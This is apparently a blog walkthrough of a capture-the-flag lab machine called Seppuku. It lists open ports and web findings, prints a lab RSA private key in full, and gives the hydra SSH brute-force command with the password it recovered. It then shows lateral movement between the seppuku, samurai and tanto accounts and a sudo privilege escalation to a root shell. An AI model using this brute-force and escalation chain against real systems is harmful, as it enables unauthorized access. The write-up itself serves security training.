本文已参与「新人创作礼」活动,一起开启掘金创作之路
Port Scan
| 21 | vsftpd 3.0.3 |
|---|---|
| 22 | OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) |
| 80 | nginx 1.14.2 |
| 139 | |
| 445 | netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP) |
| 7080 | LiteSpeed httpd |
| 7601 | Apache httpd 2.4.38 |
| 8088 | LiteSpeed httpd |
445&139 smb
forbid to log in with anonymous
7080 https
---->7601
7601:web
/secret passwd.list password.bake shawdow.bak : a1b2c3 (r@bbit-hole)
/production siimple 2.0.2
/ckeditor CKEditor 4.14
keys/
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAypJlwjKXf0F4YvL2gfwvoUuvB7fuGMMfCe41gLCsTsleOUy2
CJX+oNwVVKPpl6TYI4nXPGbiwfGzoxm0FZa7D9yr83OgwuvMMp83OkVcwL9v+x7a
tK8AAVZ0NjvOPGkvEhB2rPS2mKg1xRKXCM7pA0KSOoDbk9coOpadjg4G0f1YPWrw
p6iLfIErfY2+5hS7QyTQpuRmHuR4eKLF1NFRp8gYuNCVtr0n2Uu6hWuI7RWBGQZJ
Joj8LKjfRRYmKGpyqiGTdRy+8yCyAuT55shuCzXuc+/3HE2jACOD8+pSPKjwxzm4
fuaSfBTUkHfyhiSKIkop2YfIDLKRPM8dGn5zuQIDAQABAoIBADM+s7Vb3Q1ZP54w
foHFjTsNjVqzge0Lt1doxmomx4Aq2sY+DLLBVyfUZSUDTj2JexAKd8OU93o+rcXt
46uudOX/WhR9RMbqpb6MnokEMQGlrCtn08Xvm127RCzQFk0cAsdcGNmKEoMt0mRn
XoPg6/tiJOHd5S5SOKARqAveqoUGUYI3xgsiRpj8CCRIDUgHi9J0++qUeauVw3m3
lvyTnUTw0uf5+sRkI173CUY+ygJapGM7Lg59xzcjEq5H4so0IztQo3o/pOIfeS6W
bqIpY7D63YBGLgpi9JcN/d2bSfafkfhcrAcjPjRXwEFPmYjMbsTBOKcTtCSDVo6/
ho6fTl0CgYEA9F1uIkqxFKIMt2/uK4/1gPOXy/1cjxcsFoah0Ql7d0gj26H6AgXk
nPncIoO1kojPnB+TUy4qz+Bd7teDbkHSaWNJYIVJZQbvskstwgL4+XamiWrJA/Jp
h7y0I0zRxCMBj5yhBNrp6P+f8vtVMpjbKV17jfe6aakfyuayPugHHh8CgYEA1DeM
4lR/+/fUbxtws+aTx8h9TwisYq38D39KNsWkynnb+9pnLCbVbVETtv4sfD/aQfah
R7CxOG+mD4Vryjpk/wwzZeUDzcQpiTx4RsgP6MkFU8knORKfBdimaUpiasWlNWgy
caXR/iA6EmA4jht8vf/+UOUV8GXV9VqDIWUhgycCgYEAvJaGcqyWMUhG7CLT+oal
f5l/Iw0rq7rEabYJmBvrT0k7czt0iK8nmgYy3+gp7ybqoqCzwFQ28itEExn78tGV
o4Pek0EKPY+22TCv5bUJlOz+5bql3AfvbbQyibO1h9tETyMgGXEhaJIvTQSu4deZ
/DiLLCttkDHXuW2FTosfQx0CgYEAkhGOSjapRRBHSxaTE3Cw5UFNZvnsVZu1tCEE
PwD5NVh9HzQr8YrlOnIk5L68deUpYF/WkNbAlLzcizBlifN5kseeFRN188qCYHCb
xPRtZuf+X7ZD5he4FzkRCcXmSeGynjkTB4CAMq+R6RYLt1yaFtk9/gZAfJBLna5o
NbM7Rt8CgYA5oPRfIpKZ5G9LJEAsBUONgBsrpXs+816ZEvBGsqPs/NPhhZMFetKm
RXxYAiEUudMsahP4Woeuxy8kWfM2J2ltwC/HRFuKnKfsHBhsn/FilspYfrafr985
tFnL/K9Z8le1saEGjwCu6zKto7CaFjj2D4Y9ji0sHGBO+tVbtmU/Jg==
-----END RSA PRIVATE KEY-----
/stg empty
80 web
info.php :phpinfo
8088 web
index.php web-console with login function
/cgi-bin empty
/docs openlistspeed 1.6
/blocked empty
22 ftp
log with anonymous failed
Attack Vector
| Evidence | Ways |
|---|---|
| password.list | SSH Enumeration |
| id_rsa | log by SSH |
| webapp:siimple,ckeditor | search vulnerabilities |
Shell as seppuku
As often say,the title of the machine will always be clue . So I used seppuku as username and password.list as password to crake the ssh account by hydra .
hydra -l seppuku -P password.lst 192.168.87.90 ssh
[22][ssh] host: seppuku.box login: seppuku password: eeyoree
Hydra returned me a password :eeyoree
And now I can log in as seppuku
And this account can ln /root to /tmp
Shell as samurai
As I see the home path of the seppuku , I found a hidden path .passwd . After I opened it , I found a password .
So I used this password to log as samurai .
And this account can excute bin but it is in tanto's home page .
So I had to log as tanto .
Shell as tanto
There was an id_rsa file had not been used yet . So I try to use it to log in .
# use vim to copy id_rsa contact to id_ras file
# remember to add enter at the end of the contact
chmod 400 id_ras
ssh -i id_rsa tanto@192.168.87.90
Privilege escalation to root
And now we have everything we need to get a root shell .
Steps are :
- creat a script "bin" to open bash at /home/tanto/.cgi_bin
- excute the script as sudo
Using tanto to do this .
mkdir /home/tanto/.cgi_bin/
echo "/bin/bash" > /home/tanto/.cgi_bin/bin
And then using samurai to do this .
sudo /home/tanto/.cgi_bin/bin /tmp/*
\
